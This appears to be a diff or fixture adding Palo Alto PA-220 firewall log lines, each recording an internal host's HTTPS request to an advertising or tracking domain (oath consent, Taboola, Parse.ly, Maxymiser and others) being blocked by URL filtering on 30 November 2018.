+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 
16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:54 PA-220 1,2018/11/30 
16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 
16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 
PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
